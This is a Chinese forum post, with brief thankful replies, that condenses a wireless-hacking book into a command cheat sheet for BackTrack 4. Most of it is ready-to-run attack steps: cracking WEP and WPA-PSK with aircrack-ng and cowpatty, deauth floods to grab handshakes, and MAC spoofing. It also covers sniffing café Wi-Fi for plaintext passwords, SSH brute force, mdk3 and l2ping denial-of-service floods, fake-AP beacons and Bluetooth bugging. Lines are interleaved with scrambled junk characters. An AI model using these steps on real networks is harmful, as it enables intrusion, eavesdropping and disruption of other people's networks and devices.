格西欧解决方案
树熊
查看: 9669|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3718

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Rippleos
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。4 U+ |5 d1 f4 k& Z8 o

2 T- c4 U7 r2 c# ?以下所有操作均在BackTrack 4中进行。; r/ P9 K6 X" r
# D6 l- p3 `& f! @
6 f% E1 p7 D+ m. N; D" V5 N
无线WEP加密P解:
4 J+ y! `# l: L' }; }1 {6 S( E1 c9 T( S1 N. a1 x* Z
注入P解:
. B' J9 H6 N$ p+ Q
' z! }/ J7 f  Y- X% G2 H. }ifconfig3 d+ x9 ]& P% X
8 r  V% `& X3 I! B
ifconfig –a! `3 W6 H5 e- y6 y
7 S6 H: K$ z- s% @2 k- [
ifconfig wlan0(无线网卡) up
" J/ A2 _! q/ F5 k( H6 E9 t! z' d8 i: l7 S2 Q0 U
airmon-ng start wlan0$ e- P4 m0 f6 ^' K7 h. R( _

0 n# p# `8 J% t# X* A8 zairodump-ng mon0% z# t4 Q8 Y; r. c1 D

3 J; G3 X/ i7 T1 k% V- O7 P" jairodump-ng --ivs –w ivsfile –c 频道 mon0或1 R; t. F  K& i

% H3 C1 s" l' u5 Z$ K; j- h& F( Yairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon05 a8 V8 |4 j- s- U, n& t3 t8 c

1 y( ~0 L& i. z/ M$ Y3 oaireplay-ng -3 –b BSSID –h Station mon0" d7 U) Z% o* A- y! [, i4 p  r2 a7 g

8 m7 |! a: O+ ]0 gaircrack-ng ivsfile-01.ivs
" M6 v! e+ U/ K9 Q
) F& a' M/ r% [) c7 R% B8 U虚连接P解(适用于无客户端连接APP解)8 q; `; _& }. P8 F, A2 R( O
, \: Q. Z4 ]. S/ \6 c. {7 f$ j
ifconfig
2 `+ e6 b! |8 p. D) n1 G
$ ]4 `5 L6 W( w- @ifconfig –a8 i( g, A+ q+ i4 @: a/ V. R

4 ~' s; ?& b  X8 sifconfig wlan0(无线网卡) up
% q4 t+ \- y- W# B/ w  E
) k9 I: K- ]6 I- N5 c7 L9 ~airmon-ng start wlan0
) q- v5 `; z4 ]! ?' p" \  F& y# p) D$ q8 `9 h+ |" k- ^
airodump-ng mon0
. K6 i( ?0 x& K. ^: i9 s( |. t! v- F( E$ A  v
airodump-ng --ivs –w ivsfile –c 频道 mon0或' a) \, u# `/ K1 b

3 J' a* m2 k. c1 H$ eairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
& `4 ?( r; k+ V  \& T+ P
1 U) T; H" O9 Z& Z9 o2 ~1 s. H! Uaireplay-ng -1 0 –e SSID –a BSSID –c Station mon0# e/ D! J- l! `# Q" D: s
3 u+ z$ x5 t& S8 g$ G2 Z
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
3 L4 a9 ~9 |4 H* z& J8 L3 ~4 w
! E" ~! Y! N+ [+ Vaircrack-ng ivsfile-01.ivs, @3 Z4 p' K! n/ g9 ?

: _  _/ q! G& Z& U$ l1 ^6 ~( F/ E% F; r
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。- U. X" s$ B& i4 z6 {
) m) o& h& p# ^( U  q( d

; \: e; e& n; m/ j) @WPA-PSKP解
* E! L7 v0 b- F3 x9 B  d! L2 l4 _
8 b/ K. V. z1 W2 d* Fifconfig
8 E" c. a# z" p5 m# c* r8 M
$ |2 q! u$ B6 _& D+ H" a7 Rifconfig –a$ x. ?) s- f4 [

) t& H% \, Z5 e7 T2 y" Q5 Xifconfig wlan0(无线网卡) up% `/ B  ?! x. M0 S  S
) a/ \5 H) K$ E* F) u$ ]0 W
airmon-ng start wlan0
& i/ R( i2 r/ f* ?$ B# C  M1 \! C$ p$ h. i* A* S# |
airodump-ng mon0; z: N, V5 Q1 V1 d0 O9 |
% t. h( h0 z4 V" _6 d
airodump-ng –w capfile –c 频道 mon09 n  O+ Z0 Z' ?
% \/ F% x# B8 a' T+ Q
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
/ u% [# O) [2 P- b
4 u. c) A& q  {/ {aircrack-ng –w Dic capfile-01.cap或% x2 S# b: _4 n* R% V7 `( g

/ q, N/ g1 B' `9 ?( q/ dcowpatty –f Dic –r capfile-01.cap –s SSID+ V& ], X2 `% A2 O: }% ~
: O- z8 |/ O' N/ F9 G
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID6 H( H3 P) w1 E( }* L5 V$ {" V
% E7 G+ \. |* G
傻瓜式P解软件SpoonWPA。
1 x6 g2 D/ `6 t0 |
! B( ~: E2 {, \$ wBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst8 b. E+ ^6 E/ I9 K

, T. }) ~) J6 C  R5 Q7 h* F& Q$ B
8 p7 I# y% v" I9 R% D) f( U字典文件的生成和上传
2 s% F4 p3 `( W- c# i' u# ^8 [+ u3 e
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。+ r/ A) H' O% K7 w% c

" F7 a; w) Z/ `4 [' T% A, |! Z2 `3 Z
BT4下开启Tftp:Services—TFTPD—start TFTPD/ K0 `* T& B5 |2 Z. E) }/ S& R: B6 V

  W8 F5 ?, i! X, F/ M; U" d. ?在Windows的CMD中运行 tftp –i IP put **.dic0 a! R- U& g8 x6 Q6 p6 s1 w1 V

7 O, r9 A; K) Y! h6 r+ k7 K5 S) g* o8 i, b; ?( |7 s) s# A" A
BT4下开启SSH:Services—SSH—start SSH
5 C1 d  D& @/ F" n8 ]5 ]" H4 U& I- l( T8 h! N8 S3 d. O
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root. F! E, v/ f! ^
6 M& Z. r+ u/ r3 f* I

8 l+ l+ N) [! L1 [AP限制MAC时的解决
/ D+ M! B! a" k1 l: q3 d! X0 o. z2 x# q0 z! S: C% D- y+ B
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
! g3 K1 C2 \# D8 t- M" B
8 i4 u+ H4 |1 J. aifconfig wlan0 hw ether NewMAC# e& O" U1 y/ O9 I9 e1 P5 @

) B7 A2 I1 e8 X: P5 a  y9 D6 P. R0 W0 {
关闭SSID广播的AP探测:
# `, u* ?. C. M, ?' [5 W
& D$ ~2 X- w+ F/ y5 J9 a2 Q1.     Deauth攻击:
5 F, a% {- A6 {- \) M. R! d; U
4 H6 e+ Z6 A* D# Aairodump-ng mon0( F! ?6 x. {/ N! _5 t

4 }/ Z  q3 ?% y) X0 _( A* Gaireplay-ng -0 10 –a BSSID –h Station mon0. O5 p  v) I- V; D' Q

1 Q5 E/ \/ @6 V' Y% D0 X2.     抓包分析; f1 }0 X4 j1 x- S& S4 ^! C  D
, z$ T$ l, ~1 W, j; X) P, @
Omnipeek
% M+ t5 k" R- V2 a( D' j: l/ n. K9 _/ z
Tcpdump –n –e –vvv –i 网卡名
; O0 p) ?  h& b7 u9 c# ^. K: u# P0 F: ~
3.     暴力P解* @# t- R6 H3 G) t& Z) [- [
0 u5 N+ s. N) A8 l5 I  U* C
Charon 1.1暴力P解
# H0 X2 ?) S' l; @; ^* c+ ?5 J3 f1 g0 d4 q6 Q

, F) j" l" C( r& A+ D( a5 a无线加密数据包的解密, D4 n) L) _0 h; x7 \

8 Q+ P6 \  V" d2 @4 s! T% z) r. J3 S) @$ j1 f% b8 Y# H$ e
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。" {: M) y, e3 x0 B$ Q; r  U
' w5 b2 L" q' ]
FilterNS     DNS解析数据包1 P- {/ O5 `7 J, U! d7 q

9 H" ]0 [& \' g$ [# R5 Z9 v" U$ fFilter:HTTP    WEB访问数据包1 V6 S! ^1 j& b+ k! W- t

/ P5 U0 S6 x5 l. L) @Filter:msnms   MSN' F1 G3 v& Y' E0 N" C

* f* A* H6 J& E+ B2 |Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。; A" ~  H1 |; y6 m- r! B' _

( ?) L1 F; l$ t* v1 `+ O/ G0 {使用airdecap-ng解密:
3 K. _. @! b: F# A
7 A! e6 I9 D5 s$ T" c1 [4 Y3 CAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap2 z' Y: U9 z- P* [4 T7 H' E# u
/ y8 W2 @2 _. b2 {

/ K) k5 B* ?3 w& ?& T6 K0 s咖啡馆中无线数据截取(开放式无加密AP)
, @2 h4 m6 S4 g4 M! h0 d8 p
* C# |2 f5 h' M2 m1.Airodump-ng –w data –c频道 mon0( J( `3 \" {" ~7 y4 R2 P- J

1 o% ?& i* P# {3 h/ p& b5 K2.使用WireShark打开分析
1 V' A8 H2 Q# g) A/ J% [0 ?7 x6 U4 b) K
+ Q7 R& |. `# h2 L* y
BT4下的渗透工具:3 z+ H; T: w+ |3 d3 Z
) N- R5 o7 M. S) k% b( U  y
nmap –sP IP/24        判断C段下存活的主机 ) Y8 N1 F7 F% n3 w% g: j; c
8 F/ q0 K6 Y( d+ d5 I' l6 p
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放  ^2 q$ A3 P5 b
9 Q- I- c5 _9 u/ y: e4 ~. H
nmap –vv –sV IP –p port   指定端口的详细信息。。。
; m* r9 i8 T* O3 J( |# _4 B- [9 x& l4 x; p
namp –O IP/24    判断主机的系统版本
6 Z* j8 \7 H' U/ z- M+ `# _$ \# _
. [# m; a6 ?+ W7 Y2 X& C4 V; N
& u* U* t5 D( n& y) r+ n! |GUI 版nmap:Zenmap
" q% D$ q( J* M- a9 Q( V4 p1 j" ~% J. D9 B& H
5 G$ S) a4 e; z
Amap使用:amap –B IP port
. g% D' y7 c9 ^! u1 ]0 ~) W
2 S, [, ?, ~# Y/ j: @Nbtscan(扫描Windows网络NetBios信息):
$ S7 F8 |- w- N. e9 t3 Q- L
, W- J" S' N: c/ O5 n9 hnbtscan –v –s : IP/24, P, ^/ Y8 N$ q3 R1 c8 r

% [  a. V6 m6 f0 z$ `nbtscan –r IP
9 o3 x$ K5 G  F" [
$ b) w. y' G: @( z1 I) s6 O+ p  F0 R/ l' j: K8 f
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.% F! G! w# y( {  J; l
- B% E8 V5 F; A$ ]; [( v1 D; L

7 [6 v7 y: a" B0 w) C1 H* VHydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)/ M* w' e. P. j# j+ [7 W
/ ^  o( l' }. H, j# c; p
BruteSSH: ./bruthe.py –h IP –u Username –d Dic5 |" b' v- a3 E4 V. F

9 k3 `9 Y- D( A) fMetasploit3使用
1 _6 g6 j: H9 `; f: f" Y无线D.0.S
/ x% D/ I- q# z$ W5 v
/ `( z/ [+ V( C0 S, Q: K( O3 @9 u, G8 R+ A
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)% S7 C' K# D+ W; W

: O8 `  S$ O! n. ~: Bairmon-ng start wlan0
! n) p0 z( N( l6 Q% u
9 K" }1 c0 Q9 _+ a; D+ fairodump-ng mon0
* H) _- ~$ Z  c2 d" W6 n1 \( o* `$ T  ~5 @- l
mdk3 mon0 a –a BSSID
# C5 p# Y$ r4 Z- U4 l3 Y" f& C% E* K- B* H- Z
对所有的AP攻击:mdk3 mon0 a: O# ^3 |$ l0 L9 ]( `( j/ f

- |9 s/ ]& N4 l2 [) U* G9 g; Q. m3 `% y% u
Deauth Flood 攻击
3 }5 t- l4 N& q7 d% T& M" p0 ^, b& e/ E, t" C
mdk3 mon0 d –c Channel; l2 ?  G4 F9 A) G, o/ n, e
( k1 E0 ~1 G2 M7 e" D- ]
图形化D.O.S攻击:Charon
' i' q. q4 S6 K$ D3 k/ b  c1 v, m
9 n! q3 C. W  K
当受到攻击时,使用Wireshark抓包可以看到异常信息。& O! F5 g$ S+ Z3 I6 t+ E, w. j
" m, u8 \- K0 D4 p$ f7 o

7 q% f! n! }) B+ M2 |; k6 HWPA-PSK高速P解3 H5 ]0 O1 R( o
1 z$ `6 Z$ {. J' u' U! {
1.       WPA-PSK PMK Hash TablesP解  w: `1 P) V( R

; |/ \0 y, @( n( ^4 y0 QCowpatty –d HashTable.hash –r ***.cap –s SSID! }5 ~; H( n3 Y  Z# e
' w& {, p9 B5 D* h* `, x0 N1 i# z
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
- Y$ E& e: G/ C) u+ |
' p1 C% M0 ~- J. Q* d0 `0 I2.       GPU辅助高速P解
- }5 i0 D/ G: T: t  @5 e$ T7 P# Z2 I" w. T
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
- {( L) R) X/ ]7 J& K$ c
! f# a& M2 {6 s1 _$ f4 @5 u3.       分布式P解
5 f4 W: t6 L8 u3 q( O7 ^# {/ p
$ v  T) ]& n8 [- @1 i" W# U  e& H9 G
AP的伪造9 D" D1 O1 Z3 ^
( |* I& x8 }' s# F  J7 U* q1 Q' Y
把AP的MAC改成目标AP的MAC0 z5 R" k3 M3 Y

0 G( X: b+ p1 b# }& D$ j网卡软AP
, z$ `4 o9 Z3 c! _3 G7 g3 }: [8 L7 T& m9 ]8 {& m

/ a3 B* z: z  D$ Q9 R伪造大量虚假AP信号:. Y- F' n  x5 P( W' U
, S% [! N" T6 j7 c& ^- l; ?8 R! i; }
随机SSID:mdk3 mon0 b –g –c 频道 : ^; J% S* U! Z2 v/ Y# I& `% R
& k% E6 [) I6 u6 ]
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
( E  Q, B- W5 g7 @
( K) I$ y  D0 r! p& _( m6 z' Q) u! u
War-Driving3 P" l  p9 `" Q4 F! [6 ~7 `8 t

/ ~% ]! \, M, U- _; _8 b热点地图绘制
* n4 z8 ^5 S5 J( g) a! d% q; G0 {
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
0 X! Z+ i  m! x- ~; Y1 P2 a. B# F' @
$ X& `& `% v' H
Netstumble
& @0 v- B# B5 h6 @: J' V
7 L9 g% C. \! G
4 H' X* J6 q8 V蓝牙Hacking$ D' |' }5 {  o4 w

7 L! M6 S( l* Y! S* m$ JWindows下的Blue Soleil工具  N& L9 s% b. a- k: G6 H

; I3 z1 [; A( Z$ Q2 l) [BT4:
* ]+ D: `% ~) _; q& S: a. a5 F7 Y$ ]% w
hciconfig 查看蓝牙适配器
; Z- z9 k+ M8 P2 ^" R
/ ^: d. q: J% J- g4 Ghciconfig hci0 up 载入蓝牙适配器
0 L8 @7 ~% ^& N: q; J3 A3 z, F# T3 ?/ j2 a& n
hciconfig hci0 class 蓝牙适配器详细信息
% ~  E, v4 t- o. a8 S- {/ n* n0 X2 Q. {! }8 C( `/ B, _
! Y# W. p+ ^4 a. K
hcitool(扫描蓝牙)
- z% W; K% e1 l4 e: |7 W' R
# s* _' `4 n& z3 A4 N9 Xhcitool –i hci0 scan2 P: B9 g: g" o! O2 O
7 C% B/ d/ w0 l) U5 l9 l, T
BTscanner(扫描蓝牙)
9 Q3 S) N& ?8 M/ R+ v+ z  y6 _3 P0 d9 k2 ]/ W0 t; N

- T( M5 l# U4 T2 B5 E* M蓝牙攻击:" `1 p" }6 l& E: B7 y. O9 _/ Z* U2 i

$ R2 o6 L6 `; v) M2 `9 hBlueBugging (适用于BlueTooth V1.1的手机); H: E% ^+ F9 t! L- _

& c* J! \6 ~" K! P' J/ v. q# yBluebugger工具:: n7 Y) B2 u3 ?% b7 b, {

" ], ?" G0 ]0 M1 s$ q! ?: CBulebugger –a HD_Addr info
- T: {% h# ~4 |$ A, @( _, k5 p6 P

. _5 g8 g. X% r9 V- b4 n" DBlueJacking/ K, Z/ ]8 R/ O% {- a/ k
4 ^5 M9 P/ ]% Q! D: I
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。0 S% j+ ]6 M, o$ d2 n$ e9 \  x

& \9 f  v2 I4 i2 k2 S% A
+ i* T0 w' C! wHD_Addr修改:  c7 K7 Q  H0 {- N* r( a4 J) O

" K! m  L! R$ L/ e- k0 N1 e7 }Bdaddr工具  r5 J( f) j4 D' W5 [0 f0 J5 D
/ G6 R( E6 V  z; r9 _$ K
bdaddr –i 蓝牙设备名 新HD_addr
  ]* ^4 L+ l) Y& i' `  v, m; E- r$ U& B9 r# @. v

2 d5 }% a2 \3 ~# R- c" Q& }蓝牙D.O.S3 e0 e4 y8 i, ~: h

+ }, ~& M# W$ y1 y* ll2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
3 Z5 f; l6 J1 t# S8 I" z& k1 x  {5 h$ F8 b: C2 J' d
hciconfig
6 C8 W; L, C7 X* V
) F* w  D0 u& \& v) I; C) T9 t  T3 W/ uhciconfig hci0 up
" f' o" a' Q2 `$ c/ T# _( u& N
. \1 Y" j: F/ I- {8 Fhcitool –i hci0 scan
9 r3 n& l& G- k1 \" K
' L3 L' A) f7 [0 G6 }7 z5 q9 i4 `- Wl2ping –s 10000 –目标MAC
+ ]8 O8 {' ?5 z
3 `& w; \  Q" ]* Y- ^8 o* N
2 J; A' A/ V  X/ X不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
5 k0 R. j' g0 ]$ ^  x% {& y5 u8 w7 y+ {- q' f5 f
./fang –r ************-############ -s7 D. @$ ]# ?0 w# A2 A$ t: z

' W$ E/ {6 ?' ]0 N# n6 j1 G5 M! h暴力P解************-############的蓝牙设备$ {# P. O9 B. H: ]
- _2 g4 \# N' ?# ]# q  o+ W4 n7 ~
./fang –l 各厂商BD_Addr分配3 o1 a6 _/ F8 S  H1 d3 j; ~: o, p
% M* D& ^% h1 g" Q
, B  m7 f. Y" h0 `
WifiZoo使用9 a& S' d( E. `7 T
9 G( S) U4 E7 c
./wifizoo.py –c Capfile& J3 A& M: ^7 v* S0 D

  G- C# \, q( p+ Z  C$ S  n访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

791

积分

中尉

签到天数: 3 天

[LV.2]偶尔看看I

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。" l% M1 @" `$ I; G* i
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
0 h7 o& _, `: p7 A# K8 K/ e  v呵呵 其实也不贵 21块 快递再一点
% m0 f' n" v1 K我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

手机版| Archiver| 无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2015-8-5 14:23 , Processed in 0.202806 second(s), 36 queries , Gzip On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表